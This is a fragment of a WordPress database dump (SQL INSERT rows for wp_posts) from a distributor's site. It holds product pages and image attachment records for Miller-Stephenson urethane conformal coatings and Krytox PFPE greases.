INSERT INTO `wp_posts` VALUES (737, 3, '2016-10-11 18:22:18', '2016-10-11 18:22:18', 'Miller-Stephenson’s Urethane Coating offers superior toughness and abrasion resistance and excellent protection from humidity and organic solvents. Urethane resins are very hard and resistant to mechanical wear, their hardness is second only to epoxy conformal coatings. However urethanes are much easier to be reworked than an epoxy. Miller-Stephenson’s Urethane Conformal Coating have the following benefits:\n<ul>\n 	<li>Reworkable and room temperature cure</li>\n 	<li>Solvent and discoloration resistant</li>\n 	<li>Fluorescent under UV light</li>\n 	<li>No cracking or crazing with vibration</li>\n 	<li>Superior toughness and abrasion resistance</li>\n</ul>', 'MS-472C', 'Miller-Stephenson’s Urethane Conformal Coating offers superior toughness and abrasion resistance and excellent protection from humidity and organic solvents. Urethane resins are very hard and resistant to mechanical wear, their hardness is second only to epoxy conformal coatings. However urethanes are much easier to be reworked than an epoxy. Miller-Stephenson’s Urethane Conformal Coating have the following benefits:\n<ul>\n 	<li>Reworkable and room temperature cure</li>\n 	<li>Solvent and discoloration resistant</li>\n 	<li>Fluorescent under UV light</li>\n 	<li>No cracking or crazing with vibration</li>\n 	<li>Superior toughness and abrasion resistance</li>\n</ul>', 'inherit', 'closed', 'closed', '', '736-autosave-v1', '', '', '2016-10-11 18:22:18', '2016-10-11 18:22:18', '', 736, 'https://132.148.10.86/wordpress/736-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (738, 3, '2016-08-23 19:56:22', '2016-08-23 19:56:22', '', 'MS-472S', 'Miller-Stephenson’s Urethane Conformal Coating offers superior toughness and abrasion resistance and excellent protection from humidity and organic solvents. Urethane resins are very hard and resistant to mechanical wear.  The base resin conforms to MIL-I-46058C Type UR, IPC-CC-830B and is UL 94 V-0 listed. The coating is recognized under UL file number E105698. MS-470S has the following benefits:\r\n<ul>\r\n 	<li>Reworkable and room temperature cure</li>\r\n 	<li>Solvent and discoloration resistant</li>\r\n 	<li>Fluorescent under UV light</li>\r\n 	<li>No cracking or crazing with vibration</li>\r\n 	<li>Superior toughness and abrasion resistance</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'polyurethane-conformal-coatings', '', '', '2016-11-24 03:33:33', '2016-11-24 03:33:33', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=738', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (739, 2, '2016-08-23 19:56:35', '2016-08-23 19:56:35', '', 'Krytox 240AA', '', 'inherit', 'open', 'closed', '', 'shutterstock_61369633', '', '', '2016-09-27 20:08:48', '2016-09-27 20:08:48', '', 642, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_61369633.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (740, 2, '2016-08-23 19:56:41', '2016-08-23 19:56:41', '', 'Krytox 240AB', '', 'inherit', 'open', 'closed', '', 'shutterstock_92852002', '', '', '2016-09-27 20:09:46', '2016-09-27 20:09:46', '', 642, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_92852002.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (744, 2, '2016-08-23 19:57:27', '2016-08-23 19:57:27', '', 'Krytox 240AC', '', 'inherit', 'open', 'closed', '', 'shutterstock_125931485', '', '', '2016-09-27 20:10:27', '2016-09-27 20:10:27', '', 642, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_125931485.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (745, 2, '2016-08-23 19:57:37', '2016-08-23 19:57:37', '', 'Krytox 240AZ', '', 'inherit', 'open', 'closed', '', 'shutterstock_300460277', '', '', '2016-09-27 20:20:35', '2016-09-27 20:20:35', '', 642, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_300460277.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (748, 2, '2016-08-23 19:58:13', '2016-08-23 19:58:13', '', 'krytox-aerospace-aviation-grease-oil', '', 'inherit', 'open', 'closed', '', 'shutterstock_415540285', '', '', '2016-08-23 20:03:20', '2016-08-23 20:03:20', '', 642, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_415540285.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (749, 2, '2016-08-23 19:58:48', '2016-08-23 19:58:48', '', 'Krytox 240AD', '', 'inherit', 'open', 'closed', '', 'shutterstock_439560973', '', '', '2016-09-27 20:13:42', '2016-09-27 20:13:42', '', 642, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_439560973.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (750, 3, '2016-08-23 20:01:14', '2016-08-23 20:01:14', '', 'EPON-Miller-Stephenson', '', 'inherit', 'open', 'closed', '', 'epon-miller-stephenson', '', '', '2016-08-23 20:01:14', '2016-08-23 20:01:14', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPON-Miller-Stephenson.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (751, 2, '2016-08-23 20:35:33', '2016-08-23 20:35:33', '', 'krytox-aerospace-grease-oil', '', 'inherit', 'open', 'closed', '', 'shutterstock_3847714', '', '', '2016-08-23 20:37:21', '2016-08-23 20:37:21', '', 648, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_3847714.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (752, 2, '2016-08-23 20:35:42', '2016-08-23 20:35:42', '', 'Krytox 280AB', '', 'inherit', 'open', 'closed', '', 'shutterstock_139725616', '', '', '2016-09-27 22:50:18', '2016-09-27 22:50:18', '', 648, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_139725616.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (753, 2, '2016-08-23 20:35:52', '2016-08-23 20:35:52', '', 'krytox-aerospace-grease-oil', '', 'inherit', 'open', 'closed', '', 'shutterstock_213079702', '', '', '2016-08-23 20:37:25', '2016-08-23 20:37:25', '', 648, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_213079702.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (754, 2, '2016-08-23 20:35:59', '2016-08-23 20:35:59', '', 'Krytox 280AC', '', 'inherit', 'open', 'closed', '', 'shutterstock_311213984', '', '', '2016-09-27 22:51:21', '2016-09-27 22:51:21', '', 648, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_311213984.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (755, 2, '2016-08-23 20:36:09', '2016-08-23 20:36:09', '', 'Krytox 250AD', '', 'inherit', 'open', 'closed', '', 'shutterstock_321602429', '', '', '2016-09-27 22:30:41', '2016-09-27 22:30:41', '', 648, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_321602429.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (756, 2, '2016-08-23 20:36:16', '2016-08-23 20:36:16', '', 'Krytox 250AC', '', 'inherit', 'open', 'closed', '', 'shutterstock_331929857', '', '', '2016-09-27 22:29:00', '2016-09-27 22:29:00', '', 648, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_331929857.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (757, 2, '2016-08-23 20:36:22', '2016-08-23 20:36:22', '', 'Krytox 283AB', '', 'inherit', 'open', 'closed', '', 'shutterstock_331929869', '', '', '2016-09-27 22:53:28', '2016-09-27 22:53:28', '', 648, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_331929869.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (758, 2, '2016-08-23 20:36:33', '2016-08-23 20:36:33', '', 'Krytox 283AA', '', 'inherit', 'open', 'closed', '', 'shutterstock_369300404', '', '', '2016-09-27 22:52:27', '2016-09-27 22:52:27', '', 648, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_369300404.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (759, 2, '2016-08-23 20:36:43', '2016-08-23 20:36:43', '', 'Krytox 283AZ', '', 'inherit', 'open', 'closed', '', 'shutterstock_384420070', '', '', '2016-09-27 22:58:16', '2016-09-27 22:58:16', '', 648, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_384420070.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (760, 2, '2016-08-24 13:36:26', '2016-08-24 13:36:26', '', 'Krytox 283AC', '', 'inherit', 'open', 'closed', '', 'krytox-grease-aerospace', '', '', '2016-09-27 22:55:21', '2016-09-27 22:55:21', '', 655, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-grease-aerospace.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (761, 2, '2016-08-24 13:36:37', '2016-08-24 13:36:37', '', 'Krytox 283AD', '', 'inherit', 'open', 'closed', '', 'krytox-grease-aerospace-aviation', '', '', '2016-09-27 22:57:06', '2016-09-27 22:57:06', '', 655, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-grease-aerospace-aviation.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (762, 2, '2016-08-24 14:53:12', '2016-08-24 14:53:12', '', 'shutterstock_54472075', '', 'inherit', 'open', 'closed', '', 'shutterstock_54472075', '', '', '2016-08-24 14:53:12', '2016-08-24 14:53:12', '', 452, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_54472075.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (763, 2, '2016-08-24 14:53:21', '2016-08-24 14:53:21', '', 'krytox_aerospace', '', 'inherit', 'open', 'closed', '', 'shutterstock_134004515', '', '', '2016-08-24 14:54:51', '2016-08-24 14:54:51', '', 452, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_134004515.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (764, 2, '2016-08-24 14:53:34', '2016-08-24 14:53:34', '', 'shutterstock_204603724', '', 'inherit', 'open', 'closed', '', 'shutterstock_204603724', '', '', '2016-08-24 14:53:34', '2016-08-24 14:53:34', '', 452, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_204603724.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (765, 2, '2016-08-24 14:53:43', '2016-08-24 14:53:43', '', 'krytox_aerospace_grease_oil', '', 'inherit', 'open', 'closed', '', 'shutterstock_376558549', '', '', '2016-08-24 15:17:40', '2016-08-24 15:17:40', '', 452, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_376558549.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (766, 2, '2016-08-24 14:53:53', '2016-08-24 14:53:53', '', 'shutterstock_395244856', '', 'inherit', 'open', 'closed', '', 'shutterstock_395244856', '', '', '2016-08-24 14:53:53', '2016-08-24 14:53:53', '', 452, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_395244856.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (767, 2, '2016-08-24 14:54:04', '2016-08-24 14:54:04', '', 'shutterstock_421483921', '', 'inherit', 'open', 'closed', '', 'shutterstock_421483921', '', '', '2016-08-24 14:54:04', '2016-08-24 14:54:04', '', 452, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_421483921.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (768, 2, '2016-08-24 14:54:16', '2016-08-24 14:54:16', '', 'krytox_aerospace_grease_oil', '', 'inherit', 'open', 'closed', '', 'shutterstock_428960251', '', '', '2016-08-24 15:24:06', '2016-08-24 15:24:06', '', 452, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_428960251.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (769, 2, '2016-08-24 15:45:35', '2016-08-24 15:45:35', 'Krytox GPL 201 grease is the product of choice in extreme temperature conditions. Most petroleum products begin to degrade above 99 °C (210 °F) and are too viscous at temperatures just below –18 °C (0 °F). Under the D-3336 test conditions of 177 °C (350 °F) and 10,000 rpm, the majority of competing hydrocarbon lubricants fail in less than 1,000 hr. But, the general purpose line of Krytox lubricants has been shown to last over 5,000 hr without failure, even at an increased temperature of 200 °C (392 °F). This extreme condition performance is what distinguishes Krytox performance lubricants from other competing products.\r\n\r\nKrytox GPL 201 grease is cost-effective across a wide range of applications. Due to their inert nature, Krytox lubricants provide a much longer usable life as compared to typical hydrocarbon oils and greases; and the longer usable life allows them to remain for considerable periods of time before needing to be replaced, if they are replaced at all. That translates to savings over time, both by lowering the amount of lubricant purchased and any downtime incurred during re-lubrication.\r\n\r\nStandard Krytox lubricants contain only carbon, oxygen, and fluorine; whereas, hydrocarbons contain hydrogen. The absence of hydrogen greatly increases the stability of the lubricants and renders them nonflammable with no flash point. They will not burn or support combustion, even in an environment of 100% liquid or gaseous oxygen.\r\n\r\nKrytox performance lubricants are not only resistant to oxygen, but they are also inert to virtually all chemicals used in a variety of industries. They are insoluble in most solvents, but are soluble in highly fluorinated fluids and some super critical fluids, such as CO2.\r\n\r\nAt elevated temperatures and pressures, PFPE oils are highly resistant to attack by gaseous and liquid oxygen. As a result, Krytox oils and greases have become preferred lubricants in the oxygen manufacturing industry and in those industries that use oxygen.\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">To learn more about Krytox NSF H-1 Rated Food Grade Lubricants click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-automotive-lubricants/">To learn more about Krytox Automotive Solutions click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-noise-vibration-harshness/">To learn more about Krytox Automotive Noise, Harshness and Vibration solutions click here. </a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-faq/">For the Krytox Frequently asked questions (FAQ) click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox/">For a general Krytox application overview, click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-product-selection-guide/">With help regarding which Krytox grease is right for you, click here.</a>', 'GPL 201', 'Krytox GPL 201 has a Oil Viscosity of 7.8 cSt at 40°C.\r\n<br /><br />\r\nEstimated useful temperature range is -70°C to 104°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-201', '', '', '2016-10-11 13:46:21', '2016-10-11 13:46:21', '', 0, 'https://132.148.10.86/wordpress/product/gpl-201/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (771, 2, '2016-08-24 15:46:16', '2016-08-24 15:46:16', '', 'Krytox GPL 201', '', 'inherit', 'open', 'closed', '', 'shutterstock_117518518', '', '', '2016-10-11 12:50:31', '2016-10-11 12:50:31', '', 769, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_117518518.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (774, 2, '2016-08-24 15:46:49', '2016-08-24 15:46:49', '', 'Krytox GPL 205', '', 'inherit', 'open', 'closed', '', 'shutterstock_329225291', '', '', '2016-09-27 15:52:47', '2016-09-27 15:52:47', '', 769, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_329225291.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (775, 2, '2016-08-24 15:46:58', '2016-08-24 15:46:58', '', 'Krytox GPL 202', '', 'inherit', 'open', 'closed', '', 'shutterstock_333727961', '', '', '2016-10-04 13:39:24', '2016-10-04 13:39:24', '', 769, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_333727961.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (778, 2, '2016-08-24 15:47:29', '2016-08-24 15:47:29', '', 'Krytox GPL 204', '', 'inherit', 'open', 'closed', '', 'shutterstock_399075487', '', '', '2016-10-04 13:41:01', '2016-10-04 13:41:01', '', 769, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_399075487.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (783, 2, '2016-08-24 15:56:04', '2016-08-24 15:56:04', 'Krytox GPL 202 grease is the product of choice in extreme temperature conditions. Most petroleum products begin to degrade above 99 °C (210 °F) and are too viscous at temperatures just below –18 °C (0 °F). Under the D-3336 test conditions of 177 °C (350 °F) and 10,000 rpm, the majority of competing hydrocarbon lubricants fail in less than 1,000 hr. But, the general purpose line of Krytox lubricants has been shown to last over 5,000 hr without failure, even at an increased temperature of 200 °C (392 °F). This extreme condition performance is what distinguishes Krytox performance lubricants from other competing products.\r\n\r\nKrytox GPL 202 grease is cost-effective across a wide range of applications. Due to their inert nature, Krytox lubricants provide a much longer usable life as compared to typical hydrocarbon oils and greases; and the longer usable life allows them to remain for considerable periods of time before needing to be replaced, if they are replaced at all. That translates to savings over time, both by lowering the amount of lubricant purchased and any downtime incurred during re-lubrication.\r\n\r\nStandard Krytox lubricants contain only carbon, oxygen, and fluorine; whereas, hydrocarbons contain hydrogen. The absence of hydrogen greatly increases the stability of the lubricants and renders them nonflammable with no flash point. They will not burn or support combustion, even in an environment of 100% liquid or gaseous oxygen.\r\n\r\nKrytox performance lubricants are not only resistant to oxygen, but they are also inert to virtually all chemicals used in a variety of industries. They are insoluble in most solvents, but are soluble in highly fluorinated fluids and some super critical fluids, such as CO2.\r\n\r\nAt elevated temperatures and pressures, PFPE oils are highly resistant to attack by gaseous and liquid oxygen. As a result, Krytox oils and greases have become preferred lubricants in the oxygen manufacturing industry and in those industries that use oxygen.\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">To learn more about Krytox NSF H-1 Rated Food Grade Lubricants click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-automotive-lubricants/">To learn more about Krytox Automotive Solutions click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-noise-vibration-harshness/">To learn more about Krytox Automotive Noise, Harshness and Vibration solutions click here. </a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-faq/">For the Krytox Frequently asked questions (FAQ) click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox/">For a general Krytox application overview, click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-product-selection-guide/">With help regarding which Krytox grease is right for you, click here.</a>', 'GPL 202', 'Krytox GPL 202 has a Oil Viscosity of 15 cSt at 40°C.\r\n<br /><br />\r\nEstimated useful temperature range is -63°C to 132°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-202', '', '', '2016-10-10 15:47:27', '2016-10-10 15:47:27', '', 0, 'https://132.148.10.86/wordpress/product/gpl-202/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (784, 2, '2016-08-24 15:56:58', '2016-08-24 15:56:58', 'Krytox GPL 203 grease is polytetrafluoroethylene (PTFE)-thickened, contains no additives, and can be used on components that come in contact with chemicals. Typical applications include valves, instruments, or bearings that come into contact with chemicals, such as alcohols, ammonia, solvents, steam, acids and bases, and oxygen systems, e.g., LOX1 and GOX2. Krytox GPL 203 grease is commonly used as a lubricant for seals and O-rings, and is compatible with most types of seals.\r\n\r\nKrytox oils and greases are silicone-free. They do not contain any VOC3 materials or chlorine and are not hazardous to the atmosphere or ozone layer. They are biologically and environmentally inert.\r\n\r\nKrytox GPL 203 grease is the product of choice in extreme temperature conditions. Most petroleum products begin to degrade above 99 °C (210 °F) and are too viscous at temperatures just below –18 °C (0 °F). Under the D-3336 test conditions of 177 °C (350 °F) and 10,000 rpm, the majority of competing hydrocarbon lubricants fail in less than 1,000 hr. But, the general purpose line of Krytox lubricants has been shown to last over 5,000 hr without failure, even at an increased temperature of 200 °C (392 °F). This extreme condition performance is what distinguishes Krytox performance lubricants from other competing products.\r\n\r\nKrytox GPL 203 grease is cost-effective across a wide range of applications. Due to their inert nature, Krytox lubricants provide a much longer usable life as compared to typical hydrocarbon oils and greases; and the longer usable life allows them to remain for considerable periods of time before needing to be replaced, if they are replaced at all. That translates to savings over time, both by lowering the amount of lubricant purchased and any downtime incurred during re-lubrication.\r\n\r\nStandard Krytox lubricants contain only carbon, oxygen, and fluorine; whereas, hydrocarbons contain hydrogen. The absence of hydrogen greatly increases the stability of the lubricants and renders them nonflammable with no flash point. They will not burn or support combustion, even in an environment of 100% liquid or gaseous oxygen.\r\n\r\nKrytox performance lubricants are not only resistant to oxygen, but they are also inert to virtually all chemicals used in a variety of industries. They are insoluble in most solvents, but are soluble in highly fluorinated fluids and some super critical fluids, such as CO2.\r\n\r\nAt elevated temperatures and pressures, PFPE oils are highly resistant to attack by gaseous and liquid oxygen. As a result, Krytox oils and greases have become preferred lubricants in the oxygen manufacturing industry and in those industries that use oxygen.\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">To learn more about Krytox NSF H-1 Rated Food Grade Lubricants click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-automotive-lubricants/">To learn more about Krytox Automotive Solutions click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-noise-vibration-harshness/">To learn more about Krytox Automotive Noise, Harshness and Vibration solutions click here. </a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-faq/">For the Krytox Frequently asked questions (FAQ) click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox/">For a general Krytox application overview, click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-product-selection-guide/">With help regarding which Krytox grease is right for you, click here.</a>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'GPL 203', 'Krytox GPL 203 has a Oil Viscosity of 30 cSt at 40°C.\r\n<br /><br />\r\nEstimated useful temperature range is -60°C to 154°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-203', '', '', '2016-10-10 15:45:10', '2016-10-10 15:45:10', '', 0, 'https://132.148.10.86/wordpress/product/gpl-203/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (786, 2, '2016-08-24 15:59:41', '2016-08-24 15:59:41', '', 'Krytox GPL 203', '', 'inherit', 'open', 'closed', '', 'shutterstock_295431182', '', '', '2016-10-04 13:40:06', '2016-10-04 13:40:06', '', 784, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_295431182.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (787, 2, '2016-08-24 15:59:49', '2016-08-24 15:59:49', '', 'shutterstock_295431191', '', 'inherit', 'open', 'closed', '', 'shutterstock_295431191', '', '', '2016-08-24 15:59:49', '2016-08-24 15:59:49', '', 784, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_295431191.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (788, 2, '2016-08-24 16:42:13', '2016-08-24 16:42:13', 'Krytox GPL 204 grease is the product of choice in extreme temperature conditions. Most petroleum products begin to degrade above 99 °C (210 °F) and are too viscous at temperatures just below –18 °C (0 °F). Under the D-3336 test conditions of 177 °C (350 °F) and 10,000 rpm, the majority of competing hydrocarbon lubricants fail in less than 1,000 hr. But, the general purpose line of Krytox lubricants has been shown to last over 5,000 hr without failure, even at an increased temperature of 200 °C (392 °F). This extreme condition performance is what distinguishes Krytox performance lubricants from other competing products.\r\n\r\nKrytox GPL 204 grease is cost-effective across a wide range of applications. Due to their inert nature, Krytox lubricants provide a much longer usable life as compared to typical hydrocarbon oils and greases; and the longer usable life allows them to remain for considerable periods of time before needing to be replaced, if they are replaced at all. That translates to savings over time, both by lowering the amount of lubricant purchased and any downtime incurred during re-lubrication.\r\n\r\nStandard Krytox lubricants contain only carbon, oxygen, and fluorine; whereas, hydrocarbons contain hydrogen. The absence of hydrogen greatly increases the stability of the lubricants and renders them nonflammable with no flash point. They will not burn or support combustion, even in an environment of 100% liquid or gaseous oxygen.\r\n\r\nKrytox performance lubricants are not only resistant to oxygen, but they are also inert to virtually all chemicals used in a variety of industries. They are insoluble in most solvents, but are soluble in highly fluorinated fluids and some super critical fluids, such as CO2.\r\n\r\nAt elevated temperatures and pressures, PFPE oils are highly resistant to attack by gaseous and liquid oxygen. As a result, Krytox oils and greases have become preferred lubricants in the oxygen manufacturing industry and in those industries that use oxygen.\r\n', 'GPL 204', 'Krytox GPL 204 has a Oil Viscosity of 60 cSt at 40°C.\r\n<br /><br />\r\nEstimated useful temperature range is -51°C to 179°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-204', '', '', '2016-10-04 13:41:06', '2016-10-04 13:41:06', '', 0, 'https://132.148.10.86/wordpress/product/gpl-204/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (789, 2, '2016-08-24 16:43:24', '2016-08-24 16:43:24', '<h1><strong>Krytox GPL 205 Product Information</strong></h1>\r\n<h4>Krytox GPL 205 grease are thickened with polytetrafluoroethylene (PTFE).</h4>\r\nThis special high efficiency thickener has a melting point of 325 °C (617 °F) and has low molecular weight and sub-micron (0.2 m) particle size for higher performance in bearings. Krytox GPL 205 grease is a white buttery grease with all of the same properties as the Krytox GPL 105 oil that it is are made from, but it is in a grease form.\r\n\r\nThe standard grease consistency is NLGI grade 2 penetration (265–295). Softer or harder NLGI penetration grades can be made by special order.\r\n\r\nKrytox GPL 205 is food grade NSF H-1 Rated for incidental food contact. To learn more about applications regarding food grade greases click on the link below. As with the full line of Krytox lubricants, Krytox oils and greases deliver superior performance with advanced features of high-temperature stability, nonflammability, and chemical and biological inertness. Krytox lubricants will not carbonize or form gummy deposits that typically cause failures, nor will they evaporate. Therefore, maintenance costs can be significantly reduced.\r\n\r\nSpecial nonmelting XHT grades are available for applications that are higher than the 325 °C (617 °F) melting point of the standard PTFE thickener.\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-prepare-bearings/">Prepping a bearing for Krytox is a simple process. Click here to get a step by step guide on how to prep a bearing with Krytox grease.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">To learn more about Krytox NSF H-1 Rated Food Grade Lubricants click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-automotive-lubricants/">To learn more about Krytox Automotive Solutions click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-noise-vibration-harshness/">To learn more about Krytox Automotive Noise, Harshness and Vibration solutions click here. </a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-faq/">For the Krytox Frequently asked questions (FAQ) click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-product-selection-guide/">With help regarding which Krytox grease is right for you, click here.</a>\r\n\r\n<a href="https://www.grainger.com/product/KRYTOX-White-PTFE-Multipurpose-Grease-35RU38">Krytox can also be found on Grainger.</a>\r\n\r\n&nbsp;', 'GPL 205', 'Krytox GPL 205 has a Oil Viscosity of 160 cSt at 40°C.\r\n<br /><br />\r\nEstimated useful temperature range is -36°C to 204°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-205', '', '', '2017-01-04 19:50:55', '2017-01-04 19:50:55', '', 0, 'https://132.148.10.86/wordpress/product/gpl-205/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (790, 2, '2016-08-24 16:46:07', '2016-08-24 16:46:07', 'Krytox GPL 206 are greases are based on perfluoropolyether (PFPE) oils. This series of synthetic fluorinated lubricants are used in extreme conditions such as continuous high temperatures up to 260°C (500°F) and will survive short term peak temperatures of up to 270°C (518°F). Chemically inert and safe for use around most chemicals, these lubricants are nonflammable and are also safe for use in oxygen service.\r\n\r\nKrytox GPL 206 grease does not damage plastics or elastomers nor cause corrosion to metals. They are commonly used as lubricants in aerospace, automotive, industrial and semiconductor applications as well as in solving many other routine lubrication problems. In addition, they provide exceptionally long lifetimes in sealed-for-life bearings and extend relubrication intervals in bearings that require relubrication.\r\n\r\nThe Krytox GPL 206 grease is PTFE thickened, contains no additives and can be used on components that come in contact with chemicals. Typical applications include valves, instruments or bearings in contact with chemicals including alcohols, ammonia, solvents, steam, acids and bases, and oxygen systems including LOX and GOX. They are commonly used as seal and o-ring lubricants and are compatible with all types of seals.\r\n\r\nNew components often have organic rust preventive oils or greases on them to prevent damage while they are in storage before use. 